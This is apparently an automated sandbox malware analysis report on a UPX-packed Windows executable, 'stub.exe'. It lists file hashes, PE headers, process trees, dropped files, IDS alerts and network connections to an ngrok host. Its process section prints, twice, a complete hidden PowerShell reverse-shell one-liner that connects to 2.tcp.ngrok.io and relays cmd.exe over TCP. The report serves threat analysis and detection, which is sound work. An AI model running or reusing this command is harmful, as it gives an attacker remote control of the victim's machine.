analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

stub.exe

Full analysis: https://app.any.run/tasks/20b34031-493e-4ea0-a018-1c6c170f1815
Verdict: Malicious activity
Analysis date: September 30, 2020, 13:22:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

3DA19BB2E9C7482328A0045493A74130

SHA1:

D4484452C3E0612E0EAA6C5BC4A46930A9B7BBEA

SHA256:

771BAECF3C3BF2269FA78C5287B88DEC7BF1188359F6AF81D9C4C881347C2BD2

SSDEEP:

384:PlAtOTJMiOd+/X9GjcX/5PwxEVppNsp/x0C6aNJawcudoD7UEOk5/wLC4:Pl3lWdUM4FXYpaCLnbcuyD7UEOkGO4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3284)
      • cmd.exe (PID: 3160)
      • cmd.exe (PID: 2692)
      • cmd.exe (PID: 4028)
      • cmd.exe (PID: 3764)
      • cmd.exe (PID: 376)
      • cmd.exe (PID: 2468)
      • cmd.exe (PID: 1708)
      • cmd.exe (PID: 2160)
      • cmd.exe (PID: 3356)
      • cmd.exe (PID: 2392)
    • Runs app for hidden code execution

      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 3368)
      • powershell.exe (PID: 972)
      • powershell.exe (PID: 3212)
      • powershell.exe (PID: 584)
      • powershell.exe (PID: 2168)
      • powershell.exe (PID: 2740)
      • powershell.exe (PID: 2340)
      • powershell.exe (PID: 2672)
      • powershell.exe (PID: 2796)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 3368)
      • powershell.exe (PID: 972)
      • powershell.exe (PID: 3212)
      • powershell.exe (PID: 584)
      • powershell.exe (PID: 2168)
      • powershell.exe (PID: 2740)
      • powershell.exe (PID: 2340)
      • powershell.exe (PID: 2796)
      • powershell.exe (PID: 2672)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2372)
      • stub.exe (PID: 2816)
      • stub.exe (PID: 2880)
      • powershell.exe (PID: 3156)
      • stub.exe (PID: 2536)
      • powershell.exe (PID: 3368)
      • stub.exe (PID: 2176)
      • powershell.exe (PID: 972)
      • powershell.exe (PID: 3212)
      • stub.exe (PID: 2960)
      • stub.exe (PID: 4032)
      • powershell.exe (PID: 584)
      • stub.exe (PID: 2640)
      • powershell.exe (PID: 2168)
      • stub.exe (PID: 2700)
      • powershell.exe (PID: 2740)
      • stub.exe (PID: 1244)
      • powershell.exe (PID: 2340)
      • stub.exe (PID: 2000)
      • powershell.exe (PID: 2796)
      • stub.exe (PID: 2964)
      • powershell.exe (PID: 2672)
    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 1728)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (64.1)
.dll | Win32 Dynamic Link Library (generic) (15.5)
.exe | Win32 Executable (generic) (10.6)
.exe | Generic Win/DOS Executable (4.7)
.exe | DOS Executable Generic (4.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:03:21 11:26:43+01:00
PEType: PE32
LinkerVersion: 2.5
CodeSize: 20480
InitializedDataSize: 4096
UninitializedDataSize: 36864
EntryPoint: 0xd570
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 21-Mar-2018 10:26:43
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 21-Mar-2018 10:26:43
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00009000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x0000A000
0x00005000
0x00004200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.84458
.rsrc
0x0000F000
0x00001000
0x00000600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
5.08138

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.8674
874
UNKNOWN
English - United States
RT_MANIFEST

Imports

COMCTL32.DLL
GDI32.DLL
KERNEL32.DLL
MSVCRT.dll
OLE32.DLL
SHELL32.DLL
SHLWAPI.DLL
USER32.DLL
WINMM.DLL
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
92
Monitored processes
46
Malicious processes
24
Suspicious processes
10

Behavior graph

Click at the process to see the details
start stub.exe no specs stub.exe cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs whoami.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs stub.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3656"C:\Users\admin\AppData\Local\Temp\stub.exe" C:\Users\admin\AppData\Local\Temp\stub.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
2816"C:\Users\admin\AppData\Local\Temp\stub.exe" C:\Users\admin\AppData\Local\Temp\stub.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
3284"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\1\C17C.tmp.bat C:\Users\admin\AppData\Local\Temp\stub.exe"C:\Windows\system32\cmd.exestub.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2372powershell -w hidden -nop -c $a='2.tcp.ngrok.io';$b=11493;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1728"cmd.exe"C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880stubC:\Users\admin\AppData\Local\Temp\stub.execmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
3160"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\2\209E.tmp.bat C:\Users\admin\AppData\Local\Temp\stub.exe"C:\Windows\system32\cmd.exestub.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3156powershell -w hidden -nop -c $a='2.tcp.ngrok.io';$b=11493;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2116"cmd.exe"C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2536stubC:\Users\admin\AppData\Local\Temp\stub.execmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
3 327
Read events
2 678
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
22
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
2372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ORUB51LLGIZSGMNOQJHR.temp
MD5:
SHA256:
3156powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FBT567A0XN01TJMKW0YR.temp
MD5:
SHA256:
3368powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LL1OU3YKWXNII6MNYQ80.temp
MD5:
SHA256:
972powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWV07BCB15ZQZTXUPC5I.temp
MD5:
SHA256:
3212powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OHFX82PU1C95IGTFXDN.temp
MD5:
SHA256:
584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W57P9I2M27E6MLSWLTEE.temp
MD5:
SHA256:
2168powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D5CIZ3ULRW2N9856Y6C8.temp
MD5:
SHA256:
3368powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
3156powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d2235.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2816stub.exeC:\Users\admin\AppData\Local\Temp\1\C17C.tmp.battext
MD5:A8FEC99582F7F5EB2CF711BB72A911F4
SHA256:7E9CA099A4DEF886109F76E4B6D8466A53518993E95F75AB119E9CAB87DE9BF6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
11
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
972
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
584
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
2372
powershell.exe
3.131.123.134:11493
2.tcp.ngrok.io
US
malicious
3212
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
3368
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
3156
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
2672
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
2740
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
2796
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious
2168
powershell.exe
13.59.15.185:11493
2.tcp.ngrok.io
Amazon.com, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
2.tcp.ngrok.io
  • 3.131.123.134
  • 13.59.15.185
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY DNS Query to a *.ngrok domain (ngrok.io)
2372
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Metasploit Server Response
Potential Corporate Privacy Violation
ET POLICY DNS Query to a *.ngrok domain (ngrok.io)
3156
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Metasploit Server Response
3156
powershell.exe
Successful Administrator Privilege Gain
GPL EXPLOIT Microsoft cmd.exe banner
3368
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Metasploit Server Response
3368
powershell.exe
Successful Administrator Privilege Gain
GPL EXPLOIT Microsoft cmd.exe banner
972
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Metasploit Server Response
972
powershell.exe
Successful Administrator Privilege Gain
GPL EXPLOIT Microsoft cmd.exe banner
3212
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Metasploit Server Response
No debug info